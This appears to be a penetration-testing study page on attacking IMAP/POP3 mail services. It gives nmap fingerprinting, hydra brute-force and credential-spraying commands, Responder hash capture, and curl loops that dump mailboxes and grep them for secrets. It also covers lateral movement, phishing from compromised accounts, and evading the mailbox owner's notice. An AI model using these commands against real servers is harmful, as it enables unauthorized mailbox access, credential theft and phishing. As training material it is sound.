IMAP / POP3 - Ports 143, 993, 110, 995
Cheatsheet
# Nmap service detection + capability/NTLM scripts
nmap -sV -sC -p110,143,993,995 <IP>
nmap --script imap-capabilities,pop3-capabilities -p143,110 <IP>
nmap --script imap-ntlm-info,pop3-ntlm-info -p143,110 <IP>
nc -nv <IP> 143
nc -nv <IP> 110
# IMAPs
# manual interaction got em from https://donsutherland.org/crib/imap
telnet target.com 143
# Encrypted connections
openssl s_client -connect <IP>:993 -crlf -quiet
A1 LOGIN <USER> <PASS> #login
A2 LIST "" * #list all folders
A3 LIST "INBOX" * #list inbox folder
A4 SELECT "INBOX" #select inbox folder
A5 UID SEARCH ALL #search all messages this will fetch uid with message ids
A4 UID FETCH <UID> BODY[] #fetch full message
A7 LOGOUT #logout
# POP3
telnet <IP> 110
#encryted
openssl s_client -connect <IP>:995 -crlf -quiet
USER username
PASS password
APOP <name> <digest> # auth with MD5 digest instead of plaintext pass
CAPA # Lists server-supported capabilities
## 2. Mailbox Status & Summary
STAT # Returns total number of messages and total mailbox size
LIST # Lists all message IDs with respective sizes in octets
LIST <msg#> # Retrieves the size of a specific message (by number)
UIDL # Lists unique IDs for all messages (track across sessions)
## 3. Retrieving & Reading Messages
RETR <msg#> # Fetches the full content (headers + body) of the specified message
TOP <msg#> <lines> # Fetches message headers and <lines> of body (partial preview)
## 4. Deletion & Session Management
DELE <msg#> # Marks a message for deletion (deleted after QUIT)
RSET # Undoes any message deletions for the session
NOOP # Sends a keepalive/no-operation command
QUIT # Ends session and deletes messages marked with DELE
# Credential attacks (spray harvested creds first, brute last)
hydra -L users.txt -P passwords.txt <IP> imap
hydra -L users.txt -P passwords.txt <IP> imaps -s 993
hydra -L users.txt -P passwords.txt <IP> pop3
hydra -L users.txt -P passwords.txt <IP> pop3s -s 995
# cURL fast bulk read (IMAP)
curl -k 'imaps://<IP>' --user <USER>:<PASS>
curl -k 'imaps://<IP>/INBOX;UID=1' --user <USER>:<PASS>
curl -k 'imaps://<IP>/INBOX?SUBJECT password' --user <USER>:<PASS>
# cURL POP3
curl -k 'pop3s://<IP>' --user <USER>:<PASS>
curl -k 'pop3s://<IP>/1' --user <USER>:<PASS>
# Dump every message in INBOX (IMAP via cURL loop)
for i in $(seq 1 100); do curl -k "imaps://<IP>/INBOX;UID=$i" --user <USER>:<PASS>; done > emails.txt
# Dump POP3 messages
for i in $(seq 1 100); do curl -k "pop3s://<IP>/$i" --user <USER>:<PASS>; done > emails.txt
# Capture relayed Net-NTLMv2 if NTLM auth is in play
sudo responder -I <INTERFACE>Methodology
The value of mail services is the contents of the mailbox, not the protocol. Emails routinely contain plaintext credentials, password-reset links, internal hostnames, VPN configs, and sensitive attachments. Pair IMAP/POP3 with SMTP user discovery for the highest yield SMTP hands you the usernames, IMAP/POP3 lets you read what those users received. Every credential found in a mailbox is sprayed against every other service.
Phase 1: Fingerprint and Capabilities
Ask youself
- What mail server and version answers on 143/110, and are the TLS ports 993/995 also open?
- Which auth mechanisms does
CAPABILITY/CAPAadvertise (LOGINDISABLED,STARTTLS,AUTH=PLAIN,AUTH=NTLM,APOP)? - Does NTLM auth leak the hostname and AD domain pre-auth?
- Are only cleartext ports open, meaning credential exchange is sniffable?
- Are there known CVEs for this exact server version?
- Does the banner differ from what Nmap reports ? could the service be proxied or version-spoofed?
nmap -sV -sC -p110,143,993,995 <IP>
# List accepted auth mechanisms (LOGINDISABLED, STARTTLS, AUTH=PLAIN, AUTH=NTLM, APOP)
nmap --script imap-capabilities -p143 <IP>
nmap --script pop3-capabilities -p110 <IP>
# Pre-auth NTLM info disclosure (hostname, NetBIOS/DNS domain, OS build)
nmap --script imap-ntlm-info -p143 <IP>
nmap --script pop3-ntlm-info -p110 <IP>
# All IMAP/POP3 scripts at once
nmap -p 143,993,110,995 --script "imap-* or pop3-*" <IP>
-
nmap -sV -sC -p110,143,993,995 <IP>: detect software and version. Common targets: Dovecot, Courier, Cyrus, Exchange, hMailServer. Confirm whether TLS ports (993/995) are reachable. -
nc -nv <IP> 143/nc -nv <IP> 110: manual banner grab. Most servers leak the exact product and version in the greeting line. - Compare the banner from netcat with Nmap’s
-sVdetection : mismatches may indicate a proxy, custom banner, or version spoofing. -
nmap --script imap-capabilities -p143 <IP>: list IMAP capabilities.LOGINDISABLEDmeans auth is blocked on this port (only TLS accepted);STARTTLSallows encryption upgrade;AUTH=PLAIN/AUTH=NTLMreveal accepted mechanisms. -
nmap --script pop3-capabilities -p110 <IP>: same for POP3.USER,APOP,SASLreveal accepted auth methods;STLSmeans STARTTLS is supported. -
nmap --script imap-ntlm-info -p143 <IP>(andpop3-ntlm-info) : if NTLM auth is supported, this discloses hostname, NetBIOS name, DNS domain, and OS build without credentials. Free AD-enumeration win. -
searchsploit dovecot/cyrus imap, check the exact version against public exploits.
Phase 2: Credential Attacks
Ask youself
- Which harvested credentials (SMTP-enumerated users, FTP, web, LDAP, DB) should I spray?
- What lockout policy applies (especially AD-backed Exchange) before I spray?
- Should I target the cleartext or TLS port to balance reliability against sniffability?
- If NTLM auth is offered, can I capture or relay Net-NTLMv2 instead of guessing?
- Can I enumerate valid users via differential error responses on POP3
USERcommands?
# Spray harvested credentials first (mail = highest reuse rate)
hydra -L users.txt -P passwords.txt <IP> imap
hydra -L users.txt -P passwords.txt <IP> pop3
# TLS-wrapped ports
hydra -L users.txt -P passwords.txt <IP> imaps -s 993
hydra -L users.txt -P passwords.txt <IP> pop3s -s 995
# Nmap brute-force scripts
nmap -p 143 --script imap-brute <IP>
nmap -p 110 --script pop3-brute <IP>
# POP3 user enumeration via error response differences
# +OK vs -ERR after USER command may reveal valid usernames
telnet <IP> 110
# Capture relayed Net-NTLMv2 if NTLM auth is in play
sudo responder -I <INTERFACE>- Spray credentials harvested elsewhere first SMTP-enumerated usernames, web app accounts, FTP creds, LDAP binds, DB passwords. Mail accounts are the #1 reuse target.
-
hydra -L users.txt -P passwords.txt <IP> imap/... pop3brute force cleartext ports. A successful login returns the account and password. -
hydra ... imaps -s 993/... pop3s -s 995target TLS ports when only those are open, or to avoid sending credentials in cleartext. - Try lazy combos:
username:username,username:Welcome1,username:Password123. Bulk-created mail accounts often share trivially predictable initial passwords. - POP3 user enumeration: some servers respond differently to valid vs invalid usernames on the
USERcommand (+OKvs-ERR). Additionally, valid users may cause a measurable timing difference before the password prompt. - If
AUTH=NTLMis offered,sudo responder -I <INTERFACE>can capture relayed Net-NTLMv2 crack offline or relay.
OPSEC: Failed mail logins land in /var/log/dovecot.log, /var/log/maillog, and SIEM forwarders. AD-backed servers (Exchange) lock out after 5-10 failures. Use targeted spraying small username lists, common passwords, slow rate never a full wordlist blast.
Phase 3: Read and Pillage Emails
Ask youself
- Which folders exist beyond INBOX (Sent, Drafts, Trash, Junk, Archive, custom)?
- What high-signal keywords surface credentials and reset links fastest?
- Am I reading non-destructively, or risking POP3 deleting messages on retrieval?
- Which attachments (
.ovpn, SSH keys, documents) are worth pulling in full? - What internal hostnames, IPs, and infrastructure details do the messages reveal?
- Is the message count large enough to justify bulk extraction over interactive browsing?
# IMAP list folders, then search and fetch (non-destructive)
a1 LOGIN <USER> <PASS>
a2 LIST "" "*"
a3 SELECT INBOX
a4 STATUS INBOX (MESSAGES RECENT UNSEEN)
a5 SEARCH BODY "password"
a6 SEARCH SUBJECT "reset"
a7 SEARCH FROM "admin"
a8 SEARCH TEXT "confidential"
a9 SEARCH SINCE 01-Jan-2024
a10 FETCH 1 BODY[]
a11 LOGOUT# POP3 enumerate and read (RSET before QUIT if you marked deletions)
USER <USER>
PASS <PASS>
STAT
LIST
UIDL
RETR 1
TOP 1 10
RSET
QUIT# cURL bulk extraction IMAP (fastest approach)
curl -k 'imaps://<IP>' --user <USER>:<PASS>
curl -k 'imaps://<IP>/INBOX;UID=1' --user <USER>:<PASS>
for i in $(seq 1 100); do curl -k "imaps://<IP>/INBOX;UID=$i" --user <USER>:<PASS>; done > emails.txt
# cURL bulk extraction POP3
for i in $(seq 1 100); do curl -k "pop3s://<IP>/$i" --user <USER>:<PASS> > email_$i.eml 2>/dev/null; done
# Search downloaded emails for high-value strings
grep -ri 'pass\|secret\|key\|token\|vpn\|credential' emails.txt
grep -Eiorh 'https?://[^\s]+' *.eml
grep -Eiorh '\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Z|a-z]{2,}\b' *.eml- IMAP:
a LIST "" *thena SELECT <folder>enumerate and open every mailbox. Prefer IMAP over POP3: it is non-destructive and supports server-sideSEARCH. - POP3:
STAT→LIST→RETR <N>POP3 has only INBOX and may delete on retrieval. RunRSETbeforeQUITif you accidentallyDELEanything. - Check every folder, not just INBOX Sent (users mail credentials to themselves), Drafts, Trash (deleted reset emails), Junk, Archive, and custom folders.
- Search high-signal keywords:
SEARCH BODY "password","vpn","credential",SEARCH SUBJECT "reset","temp",SEARCH FROM "admin",SEARCH TEXT "confidential". Each hit returns matching message UIDs to fetch. - Use
SEARCH SINCE <date>for time-scoped results to find recent password resets or onboarding emails. - Bulk-dump with the cURL loop into
.emlfiles, thengrep -ri 'pass\|secret\|key\|token\|vpn'across them faster than reading interactively. - Extract URLs and email addresses from downloaded messages password-reset links, internal portals, and new contacts feed the next phase.
Phase 4: NTLM Hash Capture and Lateral Movement
Ask youself
- Does
CAPABILITYadvertiseAUTH=NTLMon this server? - Can I coax client mail traffic toward my interface to capture Net-NTLMv2?
- What did the pre-auth NTLM info script already reveal about the domain?
- Is the captured hash crackable, or better used in a relay?
- Which services should the mailbox-sourced credentials hit first?
- Do the same IMAP/POP3 creds authenticate to SMTP for outbound phishing?
- Are VPN configs or SSH keys in the mail immediately usable for a pivot?
# Capture Net-NTLMv2 when NTLM auth is in play
sudo responder -I <INTERFACE>
# Re-pull the pre-auth NTLM info for domain/hostname context
nmap --script imap-ntlm-info -p143 <IP>
# Build a creds file from mailbox findings, spray everywhere
nxc ssh <IP> -u users.txt -p creds.txt
nxc smb <IP> -u users.txt -p creds.txt
nxc winrm <IP> -u users.txt -p creds.txt- Confirm
AUTH=NTLMin theCAPABILITYoutput before expecting any NTLM material. -
sudo responder -I <INTERFACE>capture Net-NTLMv2 if a misconfigured client authenticates to your host; crack with hashcat/john or relay with ntlmrelayx. -
nmap --script imap-ntlm-info -p143 <IP>even with no creds, this discloses hostname, NetBIOS name, DNS domain, and OS version; feed these into LDAP/SMB enumeration. - Extract every credential from mailbox content into a fresh
creds.txtspray against SSH, SMB, WinRM, RDP, databases, and web admin panels. - Try the same IMAP/POP3 creds against SMTP. If SMTP AUTH succeeds, send phishing from a real internal account that passes SPF/DKIM/DMARC.
- If VPN configs (
.ovpn) or SSH keys appear in attachments, connect and pivot to the internal network. - Test recent password-reset links they may still be valid. The password format (e.g.
Welcome2025!) seeds sprays against other users.
Quiz
You crack a user's IMAP password and dump their mailbox. The INBOX is empty, but the Sent folder has an email from the user to themselves, subject 'creds backup', listing usernames/passwords for SSH, MySQL, and a WordPress admin panel. What's your priority order?
Reference
Protocol Overview
| Protocol | Port | Encryption | Purpose |
|---|---|---|---|
| IMAP | 143/TCP | None | Email access messages stay on the server, supports folders and server-side search |
| IMAPS | 993/TCP | TLS/SSL | Encrypted IMAP |
| POP3 | 110/TCP | None | Email download messages typically removed from the server after retrieval |
| POP3S | 995/TCP | TLS/SSL | Encrypted POP3 |
IMAP (Internet Message Access Protocol) is a standard email protocol that stores email messages on a mail server and allows the end user to view and manipulate them as though they were stored locally. Unlike POP3, IMAP synchronizes email across multiple devices and allows management of email directly on the server folder hierarchies, search, partial fetches, and flags are all server-side operations.
POP3 (Post Office Protocol version 3) retrieves emails from a remote server to a local client. It typically downloads messages and deletes them from the server (configurable). POP3 is simpler than IMAP but less feature-rich designed primarily for offline email access with no folder concept, no server-side search, and only an INBOX view.
Always prefer IMAP when both are available. POP3 has no folder concept (only INBOX), no server-side search, and may delete messages on retrieval. IMAP is non-destructive and supports SEARCH BODY queries that grep across years of email in one command.
Quick Reference
| Task | Command |
|---|---|
| Connect IMAP (telnet) | telnet <IP> 143 |
| Connect IMAP (netcat) | nc -nv <IP> 143 |
| Connect IMAPS | openssl s_client -connect <IP>:993 -crlf -quiet |
| Connect POP3 (telnet) | telnet <IP> 110 |
| Connect POP3 (netcat) | nc -nv <IP> 110 |
| Connect POP3S | openssl s_client -connect <IP>:995 -crlf -quiet |
| Nmap scan all ports | nmap -sV -sC -p110,143,993,995 <IP> |
| NTLM info (IMAP) | nmap --script imap-ntlm-info -p143 <IP> |
| NTLM info (POP3) | nmap --script pop3-ntlm-info -p110 <IP> |
| Brute force IMAP | hydra -L users.txt -P passwords.txt <IP> imap |
| Brute force POP3 | hydra -L users.txt -P passwords.txt <IP> pop3 |
| cURL list IMAP folders | curl -k 'imaps://<IP>' --user <USER>:<PASS> |
| cURL fetch IMAP email | curl -k 'imaps://<IP>/INBOX;UID=1' --user <USER>:<PASS> |
| cURL list POP3 messages | curl -k 'pop3s://<IP>' --user <USER>:<PASS> |
| cURL fetch POP3 email | curl -k 'pop3s://<IP>/1' --user <USER>:<PASS> |
IMAP Commands
| Command | Description |
|---|---|
a CAPABILITY | List server capabilities and auth mechanisms |
a LOGIN <USER> <PASS> | Authenticate |
a LIST "" * | List all mailboxes/folders |
a SELECT INBOX | Open a mailbox for reading |
a STATUS INBOX (MESSAGES RECENT UNSEEN) | Check mailbox stats without selecting |
a SEARCH ALL | Get all message UIDs |
a SEARCH BODY "password" | Search email bodies for a keyword |
a SEARCH SUBJECT "reset" | Search subjects |
a SEARCH FROM "admin" | Search by sender |
a SEARCH TEXT "confidential" | Full-text search (headers + body) |
a SEARCH SINCE 01-Jan-2024 | Date-scoped search |
a FETCH 1 BODY[] | Fetch full message (headers + body) |
a FETCH 1 BODY[HEADER] | Fetch headers only |
a FETCH 1 BODY[TEXT] | Fetch body only |
a FETCH 1:* (BODY[]) | Fetch all messages |
a STORE 1 +FLAGS (\Deleted) | Mark for deletion |
a EXPUNGE | Permanently delete marked messages |
a LOGOUT | End session |
The prefix (a, a1, b, etc.) is a tag for matching responses to commands the server echoes it back. It can be any short, consistent string; it is not a sequence counter.
POP3 Commands
| Command | Description |
|---|---|
USER <USER> | Specify username |
PASS <PASS> | Authenticate |
STAT | Mailbox stats (message count, total size) |
LIST | List all messages with sizes |
RETR <N> | Retrieve message N in full |
TOP <N> <LINES> | Get headers + first N lines of message N |
DELE <N> | Mark message N for deletion |
UIDL | List unique message IDs |
CAPA | List server capabilities |
NOOP | No operation (keep connection alive) |
RSET | Undo all deletions in this session |
QUIT | End session (commits deletions) |
QUIT commits any DELE operations from the session. If you accidentally mark messages for deletion during enumeration, run RSET before quitting otherwise you destroy evidence and tip off the user that someone was in the mailbox.
Pass-the-Hash via NTLM
When NTLM authentication is supported on IMAP/POP3, password hashes can potentially be used instead of plaintext passwords. Verify NTLM support first:
nmap -p 143 --script imap-ntlm-info <IP>If the server advertises AUTH=NTLM, captured Net-NTLMv2 hashes can be cracked offline with hashcat (-m 5600) or relayed to other services with ntlmrelayx.
Common Mistakes
- Only reading INBOX Sent, Drafts, and Trash are where users stash credentials and forgotten reset emails. Enumerate every folder with
LIST "" *. - Forgetting
RSETon POP3 a strayDELEplusQUITpermanently deletes mail, destroys evidence, and tips off the user. - Brute forcing before spraying harvested creds mail accounts have the highest reuse rate; try known credentials and lazy combos before any wordlist blast.
- Skipping
CAPABILITY/CAPAguessing passwords against an auth mechanism the server rejects wastes time and noise. Read capabilities first. - Not recycling mailbox creds every password found in mail must be sprayed against SSH, SMB, WinRM, RDP, databases, and SMTP immediately.
- Ignoring the cleartext-vs-TLS choice authenticating on 143/110 when 993/995 exist exposes credentials to anyone sniffing the wire.
- Missing POP3 user enumeration differential error responses on
USERcommands may reveal valid usernames without ever needing a password.
Quiz
You read through a user's INBOX and find a password reset email from two weeks ago. The temporary password is `Welcome2024!`. Is this useful?
#PenetrationTesting #RedTeam #Certification #Linux #Windows #IMAP #POP3 #EmailEnum #ServiceEnum #Hydra #Brute-Force #NTLM #CredentialSpraying #Mail #Responder